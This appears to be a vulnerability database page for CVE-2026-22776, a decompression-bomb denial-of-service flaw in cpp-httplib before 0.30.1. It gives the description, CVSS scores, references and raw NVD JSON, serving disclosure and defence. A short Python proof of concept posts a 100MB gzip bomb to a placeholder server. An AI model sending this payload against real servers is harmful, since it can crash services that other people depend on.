CVE-2026-22776

Description

cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.30.1, a Denial of Service (DoS) vulnerability exists in cpp-httplib due to the unsafe handling of compressed HTTP request bodies (Content-Encoding: gzip, br, etc.). The library validates the payload_max_length against the compressed data size received from the network, but does not limit the size of the decompressed data stored in memory.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:yhirose:cpp-httplib:*:*:*:*:*:*:*:* - VULNERABLE

cpp-httplib < 0.30.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import gzip
import requests

# 构造高压缩比恶意数据
original_data = b'A' * (1024 * 1024 * 100)  # 100MB的重复数据
compressed_data = gzip.compress(original_data)

print(f"Original size: {len(original_data)} bytes")
print(f"Compressed size: {len(compressed_data)} bytes")
print(f"Compression ratio: {len(original_data) / len(compressed_data):.1f}:1")

# 发送恶意请求
url = "http://target-server/api/upload"
headers = {
    'Content-Encoding': 'gzip',
    'Content-Type': 'application/octet-stream',
    'Content-Length': str(len(compressed_data))
}

try:
    response = requests.post(url, data=compressed_data, headers=headers)
    print(f"Response status: {response.status_code}")
except Exception as e:
    print(f"Request failed: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22776
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22776
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22776/
[4] VulDB https://vuldb.com/cve/CVE-2026-22776
[5] https://github.com/yhirose/cpp-httplib/commit/2e2e47bab1ae6a853476eecbc4bf279dd1fef792
[6] https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-h934-98h4-j43q

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22776", "sourceIdentifier": "[email protected]", "published": "2026-01-12T19:16:03.630", "lastModified": "2026-01-15T22:43:10.097", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to version 0.30.1, a Denial of Service (DoS) vulnerability exists in cpp-httplib due to the unsafe handling of compressed HTTP request bodies (Content-Encoding: gzip, br, etc.). The library validates the payload_max_length against the compressed data size received from the network, but does not limit the size of the decompressed data stored in memory."}, {"lang": "es", "value": "cpp-httplib es una biblioteca C++11 multiplataforma, de un solo archivo y solo de cabecera HTTP/HTTPS. Antes de la versión 0.30.1, existe una vulnerabilidad de denegación de servicio (DoS) en cpp-httplib debido al manejo inseguro de cuerpos de solicitud HTTP comprimidos (Content-Encoding: gzip, br, etc.). La biblioteca valida el payload_max_length contra el tamaño de los datos comprimidos recibidos de la red, pero no limita el tamaño de los datos descomprimidos almacenados en memoria."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:yhirose:cpp-httplib:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.30.1", "matchCriteriaId": "CFD0603E-49FC-455F-AEE6-0BF4ADCC6E54"}]}]}], "references": [{"url": "https://github.com/yhirose/cpp-httplib/commit/2e2e47bab1ae6a853476eecbc4bf279dd1fef792", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-h934-98h4-j43q", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}